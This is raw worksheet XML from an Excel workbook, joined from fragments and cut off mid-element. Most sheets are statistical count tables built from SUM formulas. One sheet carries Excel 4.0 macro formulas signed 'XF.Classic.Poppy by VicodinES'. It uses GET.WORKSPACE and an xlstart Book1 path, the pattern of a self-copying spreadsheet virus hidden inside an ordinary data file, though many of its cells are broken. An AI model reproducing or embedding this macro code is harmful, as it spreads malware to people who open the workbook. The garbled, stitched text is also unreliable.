        <f aca="true" t="shared" si="3" ref="D8:D17">SUM(B8:C8)</f>
        <v>0</v>
      </c>
      <c r="E8" s="13"/>
      <c r="F8" s="13"/>
      <c r="G8" s="108">
        <f aca="true" t="shared" si="4" ref="G8:G17">SUM(E8:F8)</f>
        <v>0</v>
      </c>
      <c r="H8" s="13"/>
      <c r="I8" s="13"/>
      <c r="J8" s="108">
        <f aca="true" t="shared" si="5" ref="J8:J17">SUM(H8:I8)</f>
        <v>0</v>
      </c>
      <c r="K8" s="13"/>
      <c r="L8" s="13"/>
      <c r="M8" s="108">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:13" ht="18.75" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B9" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="C9" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D9" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E9" s="13"/>
      <c r="F9" s="13"/>
      <c r="G9" s="108">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H9" s="13"/>
      <c r="I9" s="13"/>
      <c r="J9" s="108">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K9" s="13"/>
      <c r="L9" s="13"/>
      <c r="M9" s="108">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:13" ht="18.75" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B10" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="C10" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D10" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E10" s="13"/>
      <c r="F10" s="13"/>
      <c r="G10" s="108">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H10" s="13"/>
      <c r="I10" s="13"/>
      <c r="J10" s="108">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K10" s="13"/>
      <c r="L10" s="13"/>
      <c r="M10" s="108">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:13" ht="18.75" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B11" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="C11" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D11" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E11" s="13"/>
      <c r="F11" s="13"/>
      <c r="G11" s="108">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H11" s="13"/>
      <c r="I11" s="13"/>
      <c r="J11" s="108">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K11" s="13"/>
      <c r="L11" s="13"/>
      <c r="M11" s="108">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="12" spans="1:13" ht="18.75" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B12" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="C12" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D12" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E12" s="13"/>
      <c r="F12" s="13"/>
      <c r="G12" s="108">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H12" s="13"/>
      <c r="I12" s="13"/>
      <c r="J12" s="108">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K12" s="13"/>
      <c r="L12" s="13"/>
      <c r="M12" s="108">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:13" ht="18.75" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B13" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="C13" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D13" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E13" s="13"/>
      <c r="F13" s="13"/>
      <c r="G13" s="108">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H13" s="13"/>
      <c r="I13" s="13"/>
      <c r="J13" s="108">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K13" s="13"/>
      <c r="L13" s="13"/>
      <c r="M13" s="108">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:13" ht="18.75" customHeight="1">
      <c r="A14" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B14" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="C14" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D14" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E14" s="13"/>
      <c r="F14" s="13"/>
      <c r="G14" s="108">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H14" s="13"/>
      <c r="I14" s="13"/>
      <c r="J14" s="108">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K14" s="13"/>
      <c r="L14" s="13"/>
      <c r="M14" s="108">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="15" spans="1:13" ht="18.75" customHeight="1">
      <c r="A15" s="134" t="s">
        <v>390</v>
      </c>
      <c r="B15" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="C15" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D15" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E15" s="13"/>
      <c r="F15" s="13"/>
      <c r="G15" s="108">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H15" s="13"/>
      <c r="I15" s="13"/>
      <c r="J15" s="108">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K15" s="13"/>
      <c r="L15" s="13"/>
      <c r="M15" s="108">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:13" ht="18.75" customHeight="1">
      <c r="A16" s="134" t="s">
        <v>391</v>
      </c>
      <c r="B16" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="C16" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D16" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E16" s="13"/>
      <c r="F16" s="13"/>
      <c r="G16" s="108">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H16" s="13"/>
      <c r="I16" s="13"/>
      <c r="J16" s="108">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K16" s="13"/>
      <c r="L16" s="13"/>
      <c r="M16" s="108">
        <f>SUM(K16:L16)</f>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:13" ht="18.75" customHeight="1">
      <c r="A17" s="134" t="s">
        <v>392</v>
      </c>
      <c r="B17" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="C17" s="107">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="D17" s="71">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E17" s="13"/>
      <c r="F17" s="13"/>
      <c r="G17" s="108">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="H17" s="13"/>
      <c r="I17" s="13"/>
      <c r="J17" s="108">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K17" s="13"/>
      <c r="L17" s="13"/>
      <c r="M17" s="108">
        <f>SUM(K17:L17)</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="6">
    <mergeCell ref="L2:M2"/>
    <mergeCell ref="A3:A5"/>
    <mergeCell ref="B3:M3"/>
    <mergeCell ref="E4:G4"/>
    <mergeCell ref="H4:J4"/>
    <mergeCell ref="K4:M4"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="1.141732283464567" right="0.35433070866141736" top="0.52" bottom="0.48" header="0.44" footer="0.39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30" customWidth="1"/>
    <col min="2" max="2" width="1.12109375" style="30" customWidth="1"/>
    <col min="3" max="3" width="28.125" style="30" customWidth="1"/>
    <col min="4" max="16384" width="8.00390625" style="30" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="12.75">
      <c r="A1" s="29" t="s">
        <v>286</v>
      </c>
      <c r="C1" s="30" t="b">
        <f>"XL4Poppy"</f>
        <v>0</v>
      </c>
    </row>
    <row r="2" ht="13.5" thickBot="1">
      <c r="A2" s="29" t="s">
        <v>274</v>
      </c>
    </row>
    <row r="3" spans="1:3" ht="13.5" thickBot="1">
      <c r="A3" s="31" t="s">
        <v>275</v>
      </c>
      <c r="C3" s="32" t="s">
        <v>276</v>
      </c>
    </row>
    <row r="4" spans="1:3" ht="12.75">
      <c r="A4" s="31" t="e">
        <v>#N/A</v>
      </c>
      <c r="C4" s="33" t="b">
        <f>C18</f>
        <v>0</v>
      </c>
    </row>
    <row r="5" ht="12.75">
      <c r="C5" s="33" t="e">
        <f>TRUE,</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="6" ht="13.5" thickBot="1">
      <c r="C6" s="33" t="b">
        <f>IF(A4=3)</f>
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:3" ht="12.75">
      <c r="A7" s="34" t="s">
        <v>277</v>
      </c>
      <c r="C7" s="33" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="8" spans="1:3" ht="12.75">
      <c r="A8" s="35" t="s">
        <v>278</v>
      </c>
      <c r="C8" s="33" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="9" spans="1:3" ht="12.75">
      <c r="A9" s="36" t="s">
        <v>279</v>
      </c>
      <c r="C9" s="33" t="e">
        <f>FALSE</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="10" spans="1:3" ht="12.75">
      <c r="A10" s="35" t="s">
        <v>280</v>
      </c>
      <c r="C10" s="33" t="b">
        <f>A21</f>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:3" ht="13.5" thickBot="1">
      <c r="A11" s="37" t="s">
        <v>281</v>
      </c>
      <c r="C11" s="33" t="b">
        <f>"6:30:00 PM","Hello"</f>
        <v>0</v>
      </c>
    </row>
    <row r="12" ht="12.75">
      <c r="C12" s="33" t="b">
        <f>"6:30:00 AM","Morning"</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="13.5" thickBot="1">
      <c r="C13" s="33" t="b">
        <f>,"Poppy",TRUE</f>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:3" ht="13.5" thickBot="1">
      <c r="A14" s="32" t="s">
        <v>282</v>
      </c>
      <c r="C14" s="38" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="15" ht="12.75">
      <c r="A15" s="33" t="b">
        <f>"XF.Classic.Poppy by VicodinES",2</f>
        <v>0</v>
      </c>
    </row>
    <row r="16" ht="13.5" thickBot="1">
      <c r="A16" s="33" t="b">
        <f>"ⓒ 1998 The Narkotic Network",2</f>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:3" ht="13.5" thickBot="1">
      <c r="A17" s="38" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
      <c r="C17" s="32" t="s">
        <v>283</v>
      </c>
    </row>
    <row r="18" ht="12.75">
      <c r="C18" s="33" t="e">
        <f>$A$3(GET.WORKSPACE(32)&amp;"\xlstart\Book1.")</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="19" ht="12.75">
      <c r="C19" s="33" t="e">
        <f>"Document_array",</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="20" spans="1:3" ht="12.75">
      <c r="A20" s="39" t="s">
        <v>284</v>
      </c>
      <c r="C20" s="33" t="e">
        <f>$A$1INDEX(,2)</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="21" spans="1:3" ht="12.75">
      <c r="A21" s="40" t="e">
        <f>IF(A3="Book1.",0,99)</f>
        <v>#NAME?</v>
      </c>
      <c r="C21" s="33" t="e">
        <f>$A$2INDEX(,1)</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="22" spans="1:3" ht="12.75">
      <c r="A22" s="33" t="e">
        <f>TRUE,</f>
        <v>#NAME?</v>
      </c>
      <c r="C22" s="33" t="e">
        <f>$A$4GET.DOCUMENT(3,"["&amp;A1&amp;"]"&amp;"XL4Poppy")</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="23" spans="1:3" ht="12.75">
      <c r="A23" s="33" t="b">
        <f>IF(A21=0)</f>
        <v>0</v>
      </c>
      <c r="C23" s="38" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="24" ht="12.75">
      <c r="A24" s="33" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="25" ht="12.75">
      <c r="A25" s="33" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="26" spans="1:3" ht="13.5" thickBot="1">
      <c r="A26" s="33" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C26" s="41" t="s">
        <v>285</v>
      </c>
    </row>
    <row r="27" spans="1:3" ht="12.75">
      <c r="A27" s="33" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C27" s="33" t="b">
        <f>C19</f>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:3" ht="12.75">
      <c r="A28" s="33" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C28" s="33" t="e">
        <f>TRUE,</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="29" spans="1:3" ht="12.75">
      <c r="A29" s="33" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C29" s="33" t="b">
        <f>IF(A4=3)</f>
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:3" ht="12.75">
      <c r="A30" s="33" t="b">
        <f>C18</f>
        <v>0</v>
      </c>
      <c r="C30" s="33" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="31" spans="1:3" ht="12.75">
      <c r="A31" s="33" t="b">
        <f>"XL4Poppy",A1</f>
        <v>0</v>
      </c>
      <c r="C31" s="33" t="e">
        <f>FALSE</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="32" spans="1:3" ht="12.75">
      <c r="A32" s="33" t="b">
        <f>"Sheet3","Sheet99"</f>
        <v>0</v>
      </c>
      <c r="C32" s="33" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:3" ht="12.75">
      <c r="A33" s="33" t="b">
        <f>"Sheet1","Sheet3"</f>
        <v>0</v>
      </c>
      <c r="C33" s="33" t="b">
        <f>C19</f>
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:3" ht="12.75">
      <c r="A34" s="33" t="b">
        <f>"Sheet99","Sheet1"</f>
        <v>0</v>
      </c>
      <c r="C34" s="33" t="b">
        <f>"XL4Poppy",A1</f>
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:3" ht="12.75">
      <c r="A35" s="33" t="b">
        <f>TRUE,,"VicodinES",TRUE</f>
        <v>0</v>
      </c>
      <c r="C35" s="33" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="36" spans="1:3" ht="12.75">
      <c r="A36" s="33" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C36" s="38" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="37" ht="12.75">
      <c r="A37" s="33" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="12.75">
      <c r="A38" s="33" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:3" ht="12.75">
      <c r="A39" s="33" t="b">
        <f>A3</f>
        <v>0</v>
      </c>
      <c r="C39" s="40" t="e">
        <f>"XF.Classic.Poppy"</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="40" spans="1:3" ht="12.75">
      <c r="A40" s="33" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C40" s="33" t="b">
        <f>TRUE,"VicodinES and Lord Natas greet you a good morning!"</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:3" ht="12.75">
      <c r="A41" s="38" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
      <c r="C41" s="38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pane ySplit="5" topLeftCell="A6" activePane="bottomLeft" state="frozen"/>
      <selection pane="topLeft" activeCell="B28" sqref="B28:B29"/>
      <selection pane="bottomLeft" activeCell="B5" sqref="B5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.00390625" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="6.625" style="0" customWidth="1"/>
    <col min="2" max="16" width="7.75390625" style="0" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:16" ht="14.25">
      <c r="A1" s="162" t="s">
        <v>313</v>
      </c>
      <c r="B1" s="162"/>
      <c r="C1" s="162"/>
      <c r="D1" s="162"/>
      <c r="E1" s="162"/>
      <c r="F1" s="162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 t="s">
        <v>325</v>
      </c>
      <c r="P2" s="15"/>
    </row>
    <row r="3" spans="1:16" ht="21" customHeight="1">
      <c r="A3" s="163" t="s">
        <v>177</v>
      </c>
      <c r="B3" s="165" t="s">
        <v>155</v>
      </c>
      <c r="C3" s="166"/>
      <c r="D3" s="167"/>
      <c r="E3" s="165" t="s">
        <v>156</v>
      </c>
      <c r="F3" s="166"/>
      <c r="G3" s="167"/>
      <c r="H3" s="165" t="s">
        <v>157</v>
      </c>
      <c r="I3" s="166"/>
      <c r="J3" s="167"/>
      <c r="K3" s="165" t="s">
        <v>158</v>
      </c>
      <c r="L3" s="166"/>
      <c r="M3" s="167"/>
      <c r="N3" s="165" t="s">
        <v>159</v>
      </c>
      <c r="O3" s="166"/>
      <c r="P3" s="167"/>
    </row>
    <row r="4" spans="1:16" ht="21" customHeight="1">
      <c r="A4" s="164"/>
      <c r="B4" s="50" t="s">
        <v>160</v>
      </c>
      <c r="C4" s="50" t="s">
        <v>161</v>
      </c>
      <c r="D4" s="50" t="s">
        <v>162</v>
      </c>
      <c r="E4" s="50" t="s">
        <v>160</v>
      </c>
      <c r="F4" s="50" t="s">
        <v>161</v>
      </c>
      <c r="G4" s="50" t="s">
        <v>162</v>
      </c>
      <c r="H4" s="50" t="s">
        <v>160</v>
      </c>
      <c r="I4" s="50" t="s">
        <v>161</v>
      </c>
      <c r="J4" s="50" t="s">
        <v>162</v>
      </c>
      <c r="K4" s="50" t="s">
        <v>160</v>
      </c>
      <c r="L4" s="50" t="s">
        <v>161</v>
      </c>
      <c r="M4" s="50" t="s">
        <v>162</v>
      </c>
      <c r="N4" s="50" t="s">
        <v>163</v>
      </c>
      <c r="O4" s="50" t="s">
        <v>164</v>
      </c>
      <c r="P4" s="50" t="s">
        <v>165</v>
      </c>
    </row>
    <row r="5" spans="1:17" ht="18" customHeight="1">
      <c r="A5" s="54" t="s">
        <v>10</v>
      </c>
      <c r="B5" s="53">
        <f aca="true" t="shared" si="0" ref="B5:Q5">SUM(B6:B16)</f>
        <v>16806</v>
      </c>
      <c r="C5" s="53">
        <f t="shared" si="0"/>
        <v>12833</v>
      </c>
      <c r="D5" s="53">
        <f t="shared" si="0"/>
        <v>3973</v>
      </c>
      <c r="E5" s="53">
        <f t="shared" si="0"/>
        <v>3946</v>
      </c>
      <c r="F5" s="53">
        <f t="shared" si="0"/>
        <v>2900</v>
      </c>
      <c r="G5" s="53">
        <f t="shared" si="0"/>
        <v>1046</v>
      </c>
      <c r="H5" s="53">
        <f t="shared" si="0"/>
        <v>5232</v>
      </c>
      <c r="I5" s="53">
        <f t="shared" si="0"/>
        <v>3790</v>
      </c>
      <c r="J5" s="53">
        <f t="shared" si="0"/>
        <v>1442</v>
      </c>
      <c r="K5" s="53">
        <f t="shared" si="0"/>
        <v>7628</v>
      </c>
      <c r="L5" s="53">
        <f t="shared" si="0"/>
        <v>6143</v>
      </c>
      <c r="M5" s="53">
        <f t="shared" si="0"/>
        <v>1485</v>
      </c>
      <c r="N5" s="53">
        <f t="shared" si="0"/>
        <v>16659</v>
      </c>
      <c r="O5" s="53">
        <f t="shared" si="0"/>
        <v>147</v>
      </c>
      <c r="P5" s="53">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="Q5" s="24">
        <f t="shared" si="0"/>
        <v>16806</v>
      </c>
    </row>
    <row r="6" spans="1:17" ht="18" customHeight="1">
      <c r="A6" s="134" t="s">
        <v>382</v>
      </c>
      <c r="B6" s="114">
        <f>SUM(C6:D6)</f>
        <v>2071</v>
      </c>
      <c r="C6" s="114">
        <f>SUM(F6,I6,L6)</f>
        <v>1619</v>
      </c>
      <c r="D6" s="114">
        <f>SUM(G6,J6,M6)</f>
        <v>452</v>
      </c>
      <c r="E6" s="113">
        <f aca="true" t="shared" si="1" ref="E6:E16">SUM(F6:G6)</f>
        <v>510</v>
      </c>
      <c r="F6" s="23">
        <v>335</v>
      </c>
      <c r="G6" s="23">
        <v>175</v>
      </c>
      <c r="H6" s="113">
        <f>SUM(I6,J6)</f>
        <v>816</v>
      </c>
      <c r="I6" s="23">
        <v>711</v>
      </c>
      <c r="J6" s="23">
        <v>105</v>
      </c>
      <c r="K6" s="113">
        <f>SUM(L6:M6)</f>
        <v>745</v>
      </c>
      <c r="L6" s="23">
        <v>573</v>
      </c>
      <c r="M6" s="23">
        <v>172</v>
      </c>
      <c r="N6" s="23">
        <v>2071</v>
      </c>
      <c r="O6" s="23"/>
      <c r="P6" s="23"/>
      <c r="Q6" s="24">
        <f aca="true" t="shared" si="2" ref="Q6:Q16">SUM(N6:P6)</f>
        <v>2071</v>
      </c>
    </row>
    <row r="7" spans="1:17" ht="18" customHeight="1">
      <c r="A7" s="134" t="s">
        <v>383</v>
      </c>
      <c r="B7" s="114">
        <f aca="true" t="shared" si="3" ref="B7:B16">SUM(C7:D7)</f>
        <v>371</v>
      </c>
      <c r="C7" s="114">
        <f aca="true" t="shared" si="4" ref="C7:C16">SUM(F7,I7,L7)</f>
        <v>288</v>
      </c>
      <c r="D7" s="114">
        <f aca="true" t="shared" si="5" ref="D7:D16">SUM(G7,J7,M7)</f>
        <v>83</v>
      </c>
      <c r="E7" s="113">
        <f t="shared" si="1"/>
        <v>96</v>
      </c>
      <c r="F7" s="23">
        <v>53</v>
      </c>
      <c r="G7" s="23">
        <v>43</v>
      </c>
      <c r="H7" s="113">
        <f aca="true" t="shared" si="6" ref="H7:H13">SUM(I7,J7)</f>
        <v>108</v>
      </c>
      <c r="I7" s="23">
        <v>75</v>
      </c>
      <c r="J7" s="23">
        <v>33</v>
      </c>
      <c r="K7" s="113">
        <f aca="true" t="shared" si="7" ref="K7:K15">SUM(L7:M7)</f>
        <v>167</v>
      </c>
      <c r="L7" s="23">
        <v>160</v>
      </c>
      <c r="M7" s="23">
        <v>7</v>
      </c>
      <c r="N7" s="23">
        <v>371</v>
      </c>
      <c r="O7" s="23">
        <v>0</v>
      </c>
      <c r="P7" s="23"/>
      <c r="Q7" s="24">
        <f t="shared" si="2"/>
        <v>371</v>
      </c>
    </row>
    <row r="8" spans="1:17" ht="18" customHeight="1">
      <c r="A8" s="134" t="s">
        <v>384</v>
      </c>
      <c r="B8" s="114">
        <f t="shared" si="3"/>
        <v>458</v>
      </c>
      <c r="C8" s="114">
        <f t="shared" si="4"/>
        <v>393</v>
      </c>
      <c r="D8" s="114">
        <f t="shared" si="5"/>
        <v>65</v>
      </c>
      <c r="E8" s="113">
        <f t="shared" si="1"/>
        <v>136</v>
      </c>
      <c r="F8" s="23">
        <v>74</v>
      </c>
      <c r="G8" s="23">
        <v>62</v>
      </c>
      <c r="H8" s="113">
        <f t="shared" si="6"/>
        <v>78</v>
      </c>
      <c r="I8" s="23">
        <v>75</v>
      </c>
      <c r="J8" s="23">
        <v>3</v>
      </c>
      <c r="K8" s="113">
        <f t="shared" si="7"/>
        <v>244</v>
      </c>
      <c r="L8" s="23">
        <v>244</v>
      </c>
      <c r="M8" s="23">
        <v>0</v>
      </c>
      <c r="N8" s="23">
        <v>454</v>
      </c>
      <c r="O8" s="23">
        <v>4</v>
      </c>
      <c r="P8" s="23">
        <v>0</v>
      </c>
      <c r="Q8" s="24">
        <f t="shared" si="2"/>
        <v>458</v>
      </c>
    </row>
    <row r="9" spans="1:17" ht="18" customHeight="1">
      <c r="A9" s="134" t="s">
        <v>385</v>
      </c>
      <c r="B9" s="114">
        <f t="shared" si="3"/>
        <v>888</v>
      </c>
      <c r="C9" s="114">
        <f t="shared" si="4"/>
        <v>693</v>
      </c>
      <c r="D9" s="114">
        <f t="shared" si="5"/>
        <v>195</v>
      </c>
      <c r="E9" s="113">
        <f t="shared" si="1"/>
        <v>283</v>
      </c>
      <c r="F9" s="23">
        <v>155</v>
      </c>
      <c r="G9" s="23">
        <v>128</v>
      </c>
      <c r="H9" s="113">
        <f t="shared" si="6"/>
        <v>175</v>
      </c>
      <c r="I9" s="23">
        <v>133</v>
      </c>
      <c r="J9" s="23">
        <v>42</v>
      </c>
      <c r="K9" s="113">
        <f t="shared" si="7"/>
        <v>430</v>
      </c>
      <c r="L9" s="23">
        <v>405</v>
      </c>
      <c r="M9" s="23">
        <v>25</v>
      </c>
      <c r="N9" s="23">
        <v>865</v>
      </c>
      <c r="O9" s="23">
        <v>23</v>
      </c>
      <c r="P9" s="23"/>
      <c r="Q9" s="24">
        <f t="shared" si="2"/>
        <v>888</v>
      </c>
    </row>
    <row r="10" spans="1:17" ht="18" customHeight="1">
      <c r="A10" s="134" t="s">
        <v>386</v>
      </c>
      <c r="B10" s="114">
        <f t="shared" si="3"/>
        <v>2449</v>
      </c>
      <c r="C10" s="114">
        <f t="shared" si="4"/>
        <v>2449</v>
      </c>
      <c r="D10" s="114">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="E10" s="113">
        <f t="shared" si="1"/>
        <v>640</v>
      </c>
      <c r="F10" s="23">
        <v>640</v>
      </c>
      <c r="G10" s="23"/>
      <c r="H10" s="113">
        <f t="shared" si="6"/>
        <v>827</v>
      </c>
      <c r="I10" s="23">
        <v>827</v>
      </c>
      <c r="J10" s="23"/>
      <c r="K10" s="113">
        <f t="shared" si="7"/>
        <v>982</v>
      </c>
      <c r="L10" s="23">
        <v>982</v>
      </c>
      <c r="M10" s="23"/>
      <c r="N10" s="23">
        <v>2449</v>
      </c>
      <c r="O10" s="23"/>
      <c r="P10" s="23"/>
      <c r="Q10" s="24">
        <f t="shared" si="2"/>
        <v>2449</v>
      </c>
    </row>
    <row r="11" spans="1:17" ht="18" customHeight="1">
      <c r="A11" s="134" t="s">
        <v>387</v>
      </c>
      <c r="B11" s="114">
        <f t="shared" si="3"/>
        <v>606</v>
      </c>
      <c r="C11" s="114">
        <f t="shared" si="4"/>
        <v>504</v>
      </c>
      <c r="D11" s="114">
        <f t="shared" si="5"/>
        <v>102</v>
      </c>
      <c r="E11" s="113">
        <f t="shared" si="1"/>
        <v>264</v>
      </c>
      <c r="F11" s="23">
        <v>220</v>
      </c>
      <c r="G11" s="23">
        <v>44</v>
      </c>
      <c r="H11" s="113">
        <f t="shared" si="6"/>
        <v>294</v>
      </c>
      <c r="I11" s="23">
        <v>255</v>
      </c>
      <c r="J11" s="23">
        <v>39</v>
      </c>
      <c r="K11" s="113">
        <f t="shared" si="7"/>
        <v>48</v>
      </c>
      <c r="L11" s="23">
        <v>29</v>
      </c>
      <c r="M11" s="23">
        <v>19</v>
      </c>
      <c r="N11" s="23">
        <v>556</v>
      </c>
      <c r="O11" s="23">
        <v>50</v>
      </c>
      <c r="P11" s="23"/>
      <c r="Q11" s="24">
        <f t="shared" si="2"/>
        <v>606</v>
      </c>
    </row>
    <row r="12" spans="1:17" ht="18" customHeight="1">
      <c r="A12" s="134" t="s">
        <v>388</v>
      </c>
      <c r="B12" s="114">
        <f t="shared" si="3"/>
        <v>1829</v>
      </c>
      <c r="C12" s="114">
        <f t="shared" si="4"/>
        <v>1068</v>
      </c>
      <c r="D12" s="114">
        <f t="shared" si="5"/>
        <v>761</v>
      </c>
      <c r="E12" s="113">
        <f t="shared" si="1"/>
        <v>236</v>
      </c>
      <c r="F12" s="23">
        <v>122</v>
      </c>
      <c r="G12" s="23">
        <v>114</v>
      </c>
      <c r="H12" s="113">
        <f t="shared" si="6"/>
        <v>658</v>
      </c>
      <c r="I12" s="23">
        <v>448</v>
      </c>
      <c r="J12" s="23">
        <v>210</v>
      </c>
      <c r="K12" s="113">
        <f t="shared" si="7"/>
        <v>935</v>
      </c>
      <c r="L12" s="23">
        <v>498</v>
      </c>
      <c r="M12" s="23">
        <v>437</v>
      </c>
      <c r="N12" s="23">
        <v>1829</v>
      </c>
      <c r="O12" s="23"/>
      <c r="P12" s="23"/>
      <c r="Q12" s="24">
        <f t="shared" si="2"/>
        <v>1829</v>
      </c>
    </row>
    <row r="13" spans="1:17" ht="18" customHeight="1">
      <c r="A13" s="134" t="s">
        <v>389</v>
      </c>
      <c r="B13" s="114">
        <f t="shared" si="3"/>
        <v>2359</v>
      </c>
      <c r="C13" s="114">
        <f t="shared" si="4"/>
        <v>1839</v>
      </c>
      <c r="D13" s="114">
